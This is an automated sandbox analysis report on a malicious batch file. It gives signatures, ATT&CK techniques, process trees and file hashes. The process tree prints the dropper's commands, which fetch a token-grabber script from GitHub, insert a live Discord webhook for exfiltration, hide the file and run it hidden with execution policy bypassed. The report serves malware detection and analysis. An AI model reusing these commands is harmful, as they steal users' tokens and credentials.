a08fbdb03519aba94086698e6b0dfff6ecaf6a1898947319d807c039c8847156

Resubmissions

23-02-2024 02:26

240223-cw8fbaaa2x 10

23-02-2024 02:21

240223-cs7dvaae27 10

Analysis

max time kernel
149s
max time network
142s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
23-02-2024 02:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main.bat
Size

1021B
MD5

2af9fa8f11372ee57de3a24d8194e933
SHA1

d762d1f8f41d945bed6ede83e0849abe72c45ead
SHA256

a08fbdb03519aba94086698e6b0dfff6ecaf6a1898947319d807c039c8847156
SHA512

a7f86397bb7d1feab2e8c42ffc7b164a0268d619a4cc8058af1d4b4cf61582f0efdae61bf2e292096f4fe2c17cee0913918fb3c866e4f7df81b48a5d7d66377d

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1210399637668888596/sq9DmWnxKx2Vge5EqmBBpL4Aiwl-hN_Dl0SLT0SDUAgRwBDBJETln7hznNqAh7pHoi4V

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	4076	powershell.exe
3	2952	powershell.exe
4	2952	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com
3	raw.githubusercontent.com
74	camo.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org
4	api.ipify.org

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1916	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133531288644611970"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings	OpenWith.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4076	powershell.exe
4076	powershell.exe
4780	powershell.exe
4780	powershell.exe
2952	powershell.exe
2952	powershell.exe
1148	chrome.exe
1148	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1292	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe
Token: SeCreatePagefilePrivilege	1148	chrome.exe
Token: SeShutdownPrivilege	1148	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe
1148	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1292	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1008 wrote to memory of 1148	1008	cmd.exe	77
PID 1008 wrote to memory of 1148	1008	cmd.exe	77
PID 1148 wrote to memory of 3388	1148	net.exe	78
PID 1148 wrote to memory of 3388	1148	net.exe	78
PID 1008 wrote to memory of 4076	1008	cmd.exe	79
PID 1008 wrote to memory of 4076	1008	cmd.exe	79
PID 1008 wrote to memory of 3216	1008	cmd.exe	80
PID 1008 wrote to memory of 3216	1008	cmd.exe	80
PID 1008 wrote to memory of 4780	1008	cmd.exe	81
PID 1008 wrote to memory of 4780	1008	cmd.exe	81
PID 1008 wrote to memory of 2952	1008	cmd.exe	82
PID 1008 wrote to memory of 2952	1008	cmd.exe	82
PID 2952 wrote to memory of 828	2952	powershell.exe	83
PID 2952 wrote to memory of 828	2952	powershell.exe	83
PID 828 wrote to memory of 880	828	csc.exe	84
PID 828 wrote to memory of 880	828	csc.exe	84
PID 1008 wrote to memory of 1364	1008	cmd.exe	86
PID 1008 wrote to memory of 1364	1008	cmd.exe	86
PID 1008 wrote to memory of 1916	1008	cmd.exe	87
PID 1008 wrote to memory of 1916	1008	cmd.exe	87
PID 1148 wrote to memory of 3204	1148	chrome.exe	100
PID 1148 wrote to memory of 3204	1148	chrome.exe	100
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 2772	1148	chrome.exe	105
PID 1148 wrote to memory of 460	1148	chrome.exe	101
PID 1148 wrote to memory of 460	1148	chrome.exe	101
PID 1148 wrote to memory of 3020	1148	chrome.exe	104
PID 1148 wrote to memory of 3020	1148	chrome.exe	104

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3216	attrib.exe
1364	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1008
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1210399637668888596/sq9DmWnxKx2Vge5EqmBBpL4Aiwl-hN_Dl0SLT0SDUAgRwBDBJETln7hznNqAh7pHoi4V' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4076
- C:\Windows\system32\attrib.exe
  attrib +h +s powershell123.ps1
  2⤵
  - Views/modifies file attributes
  PID:3216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2952
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xwihgsni\xwihgsni.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:828
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D72.tmp" "c:\Users\Admin\AppData\Local\Temp\xwihgsni\CSCE532A3A48E5D47D1B02FEDD28CC54.TMP"
      4⤵
      PID:880
- C:\Windows\system32\attrib.exe
  attrib -h -s powershell123.ps1
  2⤵
  - Views/modifies file attributes
  PID:1364
- C:\Windows\system32\timeout.exe
  timeout 3
  2⤵
  - Delays execution with timeout.exe
  PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:988

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1972

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:2768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffffcd89758,0x7ffffcd89768,0x7ffffcd89778
  2⤵
  PID:3204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:8
  2⤵
  PID:460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3220 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3200 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:1
  2⤵
  PID:668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:8
  2⤵
  PID:3020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:2
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4068 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:1
  2⤵
  PID:2384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:8
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:8
  2⤵
  PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5156 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:8
  2⤵
  PID:3944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5236 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:1
  2⤵
  PID:4308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5372 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5700 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:8
  2⤵
  PID:3984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5792 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:1
  2⤵
  PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1924,i,16245855031322172773,14699718956015657857,131072 /prefetch:8
  2⤵
  PID:4476

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5056

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
195KB

MD5
873734b55d4c7d35a177c8318b0caec7

SHA1
469b913b09ea5b55e60098c95120cc9b935ddb28

SHA256
4ee3aa3dc43cb3ef3f6bfb91ed8214659e9c2600a45bee9728ebbcb6f33b088d

SHA512
24f05ed981e994475879ca2221b6948418c4412063b9c07f46b8de581047ddd5d73401562fa9ee54d4ce5f97a6288c54eac5de0ca29b1bb5797bdac5a1b30308

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
a8236721a9a01c7cb51fe4f715245450

SHA1
794dfe8f7acaed528aa4ef453831d5e1042d4b5f

SHA256
3078af9d8b8e90abd0ff4e8d1367b13a53334aa314ceffcbaae01c10fd1a03e7

SHA512
6f31e0be581f3d6ddb64c33f3433661887210d659715d8d06b788430f1b928473a172e38dcbc3282952771f6bf11de4bfdcab62ad62d62297df9169bb210b8bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
2da8f2488dfff7653e507f9fd110add7

SHA1
082633d8e63a7bfe800b570ed204d5effc91e900

SHA256
5509e823287b02ef0337f85f4d9e256e7da3b11bd00b7e49b90b3d66be08bc90

SHA512
569ed2a77db89bab52d307418452ceb178d223bf59f14c4c3c24d5a82e6cf1eb87bd9bbce5c9b8732fcca4073e644db20ff61d1884baa6e90918e958d9d12333

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
3fb4fa9d060c236135abe63149671672

SHA1
7b65e6fb51ee7a1720098298bd0dd9cfa177a8b5

SHA256
a9cecf76f5b22fcdb04f0702ba2a7d3f8d515439ca21b9c05372b2d303a69d4f

SHA512
880c03e5fec9c98a95181e53f257dd36f940b4cf4581a7458ffe1e7a4ad49904c257888c5341b81108c4ac5c600d721dad57601569cf2cf678d3c4e18b025257

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
9e247a49e9de1f15b759c6bf2a554f79

SHA1
bfdc2c3a32ee145c79d9ade9bdc9407e3ed589f1

SHA256
ce1f4d857331c0741f49315d371fb837b6709a87d4a8a40cfcb137b6665f1a6a

SHA512
a7c759970899e09b282c726637d5ca9a5ae687386cf2168e0cdc52629d68cdc9fa4899f60d4f3d0edcb2269c1ba7785984ac3ace316950509183922cc3b36164

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
d06e2a38b0c3d1d3c95db7b86334a0a0

SHA1
ea79cf65d873f4c08df7d7288dccf65af6af36f0

SHA256
3b2d2f8a35c5faff88a71462517d2691e884e060587b1087595d69789f67f26b

SHA512
41b0fd6f8f158a14c20651a7867b2f3efc06f1d4016d3ae4dd10d8cc620c0db3872b0247dd219c06e6fc29131660f7d956dd883f7659231ee3ef583c3b2726b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
369B

MD5
b48242d3458ce61491f909f7aef7a985

SHA1
875b095ef471797d4b3bebc28ce477fab03d27ad

SHA256
be40851930369fcaf84fc06c9168d47090f612c38fc9f92f07bd971452d8fc26

SHA512
6b923e1ccab5a127bc64559ee79c6e5e9992db09aad4523a4260410f9ae3ebbcacf174e44756ba0d676cc5ed81a79631903d7725f825a18e1e729cd777d0242f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
703B

MD5
2a6cef7576eb85549333c783c8e6709d

SHA1
4ff05edb0834916142bd323f911f0219b10dad2d

SHA256
b1307e752c148e250121c4ff261345df026acc957fa4e1beb0f19f5dad006f48

SHA512
986a0ec893c2d750f7ecbf138ee41cf2e97108afede45ce83ca0b0b8772bca424d92ba3e6e5777d8a8ed3b5d4d90b95c5d5bf74348151832f8a69cd922b5bf3e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
fb357d23cd072e2ad641472085d2ebba

SHA1
175ea2c521044ba23403be88ce0516c2c01b398b

SHA256
db4827dbe5ac8c9c966879182827ec26b96b04be259700ddf7f55e32b3ba9f6f

SHA512
3a734ded5f538589999e931e63348ef1cda5920ac175e21f3bc61f83c80fbf94b2c4bf5b591cef026bad38c172b947718ea187838f23f9571cda5e7add748682

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
369B

MD5
460830da0cd3a6412aca2f06a2d48fd2

SHA1
255819891c11242c4f823a3d60e5cb83d11be10c

SHA256
ef8390ef1f311dc0e0ea6e12830b7ecc208d2610c18e2bf8a5883eb159a7ad9b

SHA512
1c73dfcc1f4a00812de92e2702e08f30e8790496706b0664988f361c95618ba1bca2831660e4ebefd90b25c82cf0e1fb01d3d7d7a531b87196acf831343c78b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
7c6e0679f3cbb9fd3051d0278fda8cb4

SHA1
e5da635de1b86a9132752d167641e623fb3683f0

SHA256
d2bd6001d5c13bcf2cb5d1dc4d0b8f2ff7729f98d7f2826f54ee8ce6e729f238

SHA512
61a00a62011dbd683c6342bfa633b77b8000bfbfd611c7f53ad1b8689fc698b93a0cd49d109c61f68bbb7da2735fca8e9cdade9bd1fab7a4fc1955cc205af3b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
e9d2196259e27e48d3239d796e076faa

SHA1
18cfd029e8e9f3ecced5c3339a101b4897e97457

SHA256
1063f7abce9335207428b41862eeb682b1ead32d14cf79774b43054d9f9a85ce

SHA512
f68f53489791e7c1a1122b2c6d848296f2849655d83af6ccdd8b78bdeef9c10316e9e6e4ed2d32e850f7faa5f668c968070662b9ca207ea9518127ae0703804f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
2b5d4daa850cb917de75006f5cd557f6

SHA1
db1832866413fada943c6cb5d7d10a04052bbf79

SHA256
94c798718c803b5cedbb0e1bab1a9575b4014e034e4904db838b314bcb67c117

SHA512
309edb0c12cf9ba1ee69ce9f7cd896d0407604f86b8e737acbd59e6069a7c2d1c068ffcad395f784a92f4bbc74a052f5b31fc6760510323f904d142f2763946e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
6159836c943c5716c9e16b6516b4a094

SHA1
c9015adeb0a1cf58b31bbfb574d060ded2425e77

SHA256
ccb896b68240d4d68b00211c9d9bbb6e07da58d119542f6c98a3757cf215681c

SHA512
fa3ebf673be887e044c80b3c6b642b72dbd396238ae33cfc591606a20d9d5984eaef47963765113f489d04209a7cc7fbf1f5583b1b97c9e7551e54dc27aeef8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
73dcdd7e0782920e200dd23d71a18e24

SHA1
9471b21e340ac4e065a8f925b31ca5f36d75f638

SHA256
